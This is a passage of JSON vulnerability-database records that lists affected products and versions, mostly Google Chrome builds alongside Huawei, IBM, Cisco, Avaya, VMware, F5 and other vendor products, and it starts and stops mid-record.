"eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.48" }, { "model": "oceanstor css v100r001c03", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.30" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.44" }, { "model": "vsphere storage appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.80" }, { "model": "system storage san06b-r 2498-r06", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "business service automation essentials", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.16" }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.16" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.90" }, { "model": "fusionmanager v100r003c10cp6001", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "unified presence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.2" }, { "model": "secureplatform r71.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia embedded r71.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.92" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.683.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.425.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.486.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.747.0" }, { "model": "oceanstor vis6600t v200r003c10spc100", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.333" }, { "model": "websphere process server hypervisor edition for novell suse", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.9" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1077.2" }, { "model": "studio beta", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "qradar risk manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "storefabric b-series switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1300.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.17" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.42" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mxe series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.889.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1028" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.33" }, { "model": "vcloud automation center", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.133" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.773.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.26" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "oceanstor s5800t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "12.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.10" }, { "model": "storeonce backup", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.157" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.739.0" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.5.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.19" }, { "model": "vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.404.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.27" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491059" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.2" }, { "model": "ios-xe for csr1000v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.159.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18" }, { "model": "oceanstor sns5120 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1028.0" }, { "model": "aura application server sip core pb5", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1013" }, { "model": "espace vcn3000 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.658.0" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1" }, { "model": "e9000 chassis v100r001c00spc200", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "vcenter server appliance update b", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1023" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.761.0" }, { "model": "cloud services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.690.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.16" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.660.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1676.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.41" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1669.1" }, { "model": "secure access remote access concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.587.0" }, { "model": "usc invicta series autosupport portal", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.16" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.321.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.14" }, { "model": "secureplatform r71.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.48" }, { "model": "nexus switch for nexus series 5.0 u1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v3000" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.62" }, { "model": "fusionaccess v100r005c10spc203", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.861.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.524.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.717.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.11" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.880.0" }, { "model": "oceanstor s2600t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.607.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.471.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.61" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.59" }, { "model": "gaia embedded r75.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.923.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.37" }, { "model": "oceanstor cse v100r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.309.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.232" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.58" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.778.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.74" }, { "model": "email gateway patch", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.03" }, { "model": "protectier entry edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "horizon daas platform", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.447.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.655.0" }, { "model": "operation agent virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.579.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.0" }, { "model": "oceanstor s5600t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1008" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.694.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.669.0" }, { "model": "ds8000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.97" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.702.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.3" }, { "model": "gaia embedded r70.1", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "visualization fault and performance manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "gtsoftx3000 v200r001c01sph106", "scope": "ne", "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.190.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.05.00" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.400.0" }, { "model": "vertica", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.0" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.74" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.592.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.26" }, { "model": "vfabric application director", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "storeever esl e-series tape library", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "vds service broker", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.902.0" }, { "model": "telepresence multipoint switch", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "ipso r70.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "oceanstor s3900 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ipso r77.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "ip deskphones", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.444.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.39" }, { "model": "d9036 modular encoding platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1272.0" }, { "model": "fusionstorage dsware v100r003c02spc201", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "secureplatform r75.47", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.548.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.640.0" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "pod orchestration suite", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.23" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "qradar vulnerability manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.88" }, { "model": "oceanstor v100r001c02", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v1800" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.18" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.110" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.514" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.759.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.587.1" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.84" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5.59" }, { "model": "oceanstor s5800t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "n series oncommand 6.1r1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.42" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "esight network v200r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "e6000 blade server bh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.56" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.1" }, { "model": 